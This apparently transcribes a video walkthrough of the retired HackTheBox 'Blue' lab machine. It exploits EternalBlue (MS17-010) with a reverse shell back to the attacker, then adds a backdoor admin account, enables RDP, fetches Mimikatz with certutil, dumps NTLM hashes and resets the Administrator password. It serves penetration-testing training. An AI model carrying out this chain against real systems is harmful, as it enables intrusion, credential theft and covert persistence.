Welcome back. Today we are solving another lab machine from HackTheBox. It is a retired machine and the name is Blue. Windows box, a pretty easy box. So here, let's get started. Now, first, as always, we do the Nmap scanning. So I have selected V4 versions of the services and the -SC. As you can see, we got a couple of open ports. Among them are the SMB. So we have here SMB server running on the box. Other ports are not noticeable, I guess. So if you go down, we have some other info about the system. So we have here saying that it is running Windows 7 Professional. And here the account uses guest. Okay, and the name of the PC is Harris PC. So we are dealing with Windows box. As you can see here, the info about the build number 7601 Service Pack 1, Windows 7 Professional 6.1. Okay, so as the last video, we did something similar to that, where we have dealt with a machine, Windows XP machine with open ports 139, 445, where we exploited the box manual without the need for Metasploit. And the two boxes are similar, except for the fact that this one is running Windows 7. And other than that, both were running, or both are running, the SMB ports. So the only thing we have to enumerate here is the SMB ports. So therefore, we will extend the Nmap scan to cover what can we find about this about these ports. So here we type that as script, and we select SMB dash. And here we are telling Nmap to scan the host, right? Or let me cancel that. It's better if we specify the ports, not just take forever. -P 139 445. Got here something. Okay. Let's examine the results. Let's go up, and we can see here more about the SMB version, the possible vulnerability. So we have here the host script results saying that the host is vulnerable, and the vulnerability is remote code execution vulnerability in Microsoft SMB version 1 servers, which is the infamous vulnerability for Windows XP, Windows 7, and also Windows 8, some service packs. So here's the exploit. And there are some more details we can see here. A critical remote code execution vulnerability exists in Microsoft SMB version 1. All right, so that is fair enough. Now we can use Metasploit, right? But since this is an easy box, just we need to do a bit of effort, right, to advance the learning process. So basically, this is if you go to Google. And we type, you can see many exploits. M17, 010. So here we have the Eternal Blue, and we have one in exploit database, and we have the Metasploit module, right? You can use all of these. I prefer you steer away from Metasploit if you are looking to learn, especially for OSCP. So for that exploit, we use this exploit in the last video where we solved the legacy box. Let's use something else. Here, MS17 exploit, we can type auto exploit or auto blue. Here is also another exploit we can use for that. If you go down, MS17 010, and here the instructions, but it is not that simple. We need to do a couple of stuff we don't before trying to execute the exploit. So basically here, some info about that. All right, so let's get this to our system. Grab the URL. Okay. All right. Now sudo git clone, and we put the link. Okay, so we have it. Let's cd to the directory, cd auto. All right, so what we need to do now, let's first make sure that the requirements are met. So basically sudo pip -r install or install -r requirements. All right, that's great. So it's clear. So we have here the internal checker. We can run this to check if the remote host is vulnerable. So sudo python internal checker, and we type the IP 10, 10, 10, 40. Okay, that is great. So it's saying the target is not patched. So we can then exploit that target. So next thing, we need to generate this shellcode. To do that, we need to go to that directory. So cd shellcode, and we have shell prep. Give that permission to run. Okay, now we run the shell prep, and it's an auto prompt creation. It's not hard. Unable to open output file. Oh. So, kernel shellcode compile. Would you like to auto-generate a reverse shell with MSF Venom? We're gonna say yes. Lhost for the reverse connection. It's gonna be our IP 10, 10. The part that sucks all the time. Okay, let's find out our IP. Fconfig 10, 10, 14, 9. 10, 10, 14, 9. L port, you want x64 to listen on 4545. x86, the port should be different, 4546. Type 0 to generate a interpreter shell, or 1 to generate a regular CMD shell. We type 1. Type 0 to generate a staged, or 1 to generate stageless. Since we're using a regular CMD shell, we need to type 1 for stageless. The payload will be sent one at a time. Now the shellcode is being generated by the exploit, and nothing out of the box. It's just using MSF Venom. Actually, we can do that manually. We can take this command, right, and generate the payload, putting in mind or bearing in mind that we need to put the output file or the output payload to be in .pin. So this is the payload. Now what we're gonna do here, we're gonna move that to the master directory, which is here. So ls, we have this one. So sudo mv scx yep, 86 msf. Oh, sorry. So we move that. So we move this where? Okay, so I can move this here. So I'm gonna type the full path. So here home. Okay, cd back. So this is the payload here. Now all we have to do is to run the listener. So the listener is here. Let's give the listener permissions to run. Sudo chmod -x listen. Now we run the listener. Now the lhost for the reverse connection, it is our lhost, our IP 10.10.14.9. L port for the, it was 4545, 4546. It was 1, 1. All right. So it's launching the interpreter. Cannot find the resource script config.rc. I guess the listener hasn't been set up. So let's do that ourselves and use exploit multi handler set payload. Let's go up, find the payload. So this is the payload. We have two, I'm afraid. Okay, one. So take this and go down, paste, set lhost for 10 z 14.9, set lport. So what is the lport that has been used by the payload? It was 4545. Set auto run script post goes manage migrate. We're done. Okay. Now the next thing, we need to run the exploit. So we pull the view here. Okay. ls. So the exploit is here, 7. So sudo python kernel blue, and then we put the IP of the target, 40, and then we put the name of the payload. We paste that and we enter. Let's see above here. We haven't received anything. Okay, let me exit the alright, so sudo -i. I'm encountering some problems with the permissions, so let's be root. Okay, so here we run the listener. 10, 10, 14.9, 4545, 4546, regular, staged or non-staged, stageless. Okay. All right, succeeded. Now let's run. So, all right, as you can see, we have received the interpreter shell. So we type sessions -i, and this is our session. Now we can interact with the session by typing that sessions-i1. All right, ID home/user. So we are net authority system, right? So Eternal Blue is kind of lethal vulnerability. It was lethal vulnerability before. Upon exploitation, you will get the full control over the remote host. Okay, so what else we can do now? We can add our own user for persistence. So simply we can add net user my name and then password as my name as a password. Type add. So we add our username. Now next we need to add our username to the administrator group for full control. So net local group /add select the group, which is administrators. Oh. And we put my name. Okay, so now we are administrators on the system, and we have established some kind of persistence, so we can log in later. Okay, now suppose that people want to log in back to the system at some time. At some point in time, we wanted to log in back to the system. So we need first to enable RDP. We need some kind of connection back, right? So what we can do here, we can type reg add HKey local machine, and we need this. It was system current control set. Another one, terminal server. Yep, that was it. So next with that /v f deny ts connections /t reg dw word /t or /f. Syntax specify valid numeric. Okay, let me find this the syntax. I remember it was here. Enable RDP. Just Wiki. CMD. Well, we don't have the luxury. As you can see, we need to set the value f deny TC connections to 0, which is we did here. Okay, so here our mistake is we typed O instead of 0. So here it should be 0/f. Okay, so now RDP is enabled successfully, and now we can log in as a persistence procedure in the context of a persistence. Okay, now it is open. Let's RDP. I'm gonna accept the certificate. All right, so here's my username. As you can see, we log in. So this is your HackTheBox blue machine. Click cancel. It's not our machine. Let's now go here, type cmd. And in here, as you can see, we are my name. So basically, let's go back, directory, cd, make sure we can cd to other users. Access denied. Okay, good. All right. Anyway, we have the access to administrator here, but for some reason, as you can see in the RDP here, at least we established some kind of persistence on the system here. But I can't see to the administrator. Let me see if I can see to Harris. Still access denied. Net. Okay, so let's add myself again. Group. Add. Okay, if we do it from let's do it again from the privileged prompts here. Net user. No, net local group, and now we /add. The account is already a member of the group. Okay, great. Anyway, this is your persistence session, and this is your administrator session. What if we want to grab the hash of the administrator user? Suppose that we don't want to add our username to the Windows or to the system. Maybe we're going to be, there will be some kind of, maybe they will find out about us. So in some scenario, you want all the time to avoid being detected. So let's suppose that we want to grab the administrator user. So we can do that, cd back, cd users, cd admin. Okay, so cd desktop. And here is your flag, as you can see. Now, let's download Cert Util. Let's use Cert Util to download the Mimikatz from my machine. So here, let's view. Okay. cd back, sudo Mimikatz. Where's Mimikatz? Mimikatz. Okay, so let's take it up. So here is Mimikatz. Okay. Now, Python or sudo python 3-m http.server. All right. Now, cert util-url cache-f. Let's make sure Cert is on the system before launching anything. All right, it is there. So cert util-url cache-f http 10.10 14.9 8000 Mimikatz. Oh, Jesus Christ, all the time I make typos in this tool. Cert, look at that. Oh my. Okay, so Mimikatz is being downloaded from my machine now to the administrator desktop. So now we're going to launch my manual. Let me search in my manual here. So here I'll type Mimikatz. See what we can do with Mimikatz. Oh, not this one. It is here. So we can dump the password hashes. And we can also dump the password hashes this way and the tickets. Okay, let's do that. So Mimikatz is here. Now cat.exe privilege debug. And here we're gonna, let me go back to the command. Okay, so here we have okay. Mimikatz. All right, so this is better. Okay, so here we type privilege debug. Okay, I don't need this anymore. Yes. Privilege. Okay. All right, now we dump the password hashes. Okay, so here, let's see the administrator. administrator Harris. Go up, up, up. So this is my username, and this is my NTLM hash. This also my username. Let's look for the administrator. So the administrator is absent. Okay, I found my username. That's good. So we can change the administrator password here. Let's exit. Okay, so net user administrator and put it as my name. All right, now here, let's go back to RDP, close the session, and open it again with a new password, rdesktop-u administrator host 10, 10, 10, 40. Other user, so we type administrator and the password. So now we are logged in as the administrator of the system. As you can see, the Mimikatz here and the flag here. I'm not going to open it. So yeah, that was it.